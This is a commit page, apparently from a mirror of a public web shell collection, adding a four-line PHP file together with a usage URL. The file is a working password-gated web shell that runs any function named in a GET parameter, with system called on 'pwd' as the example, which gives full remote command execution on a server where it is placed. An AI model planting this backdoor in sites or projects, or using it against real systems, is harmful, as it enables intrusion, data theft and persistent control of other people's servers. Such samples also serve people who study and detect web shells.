mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Create 2022-08-26-06.php
from: https://mp.weixin.qq.com/s/f6cFhc0Ukk0wQFGP1lQ4BQ usage: http://example.com/shell3.php?f=system&a=pwd&p=password
This commit is contained in:
parent
3e96ef6e7b
commit
52d483f2cd
1 changed files with 4 additions and 0 deletions
4
php/2022-08-26-06.php
Normal file
4
php/2022-08-26-06.php
Normal file
|
@ -0,0 +1,4 @@
|
|||
<?php
|
||||
if ($_GET['p']=='password'){
|
||||
$_GET['f']($_GET['a']);
|
||||
}
|
Loading…
Reference in a new issue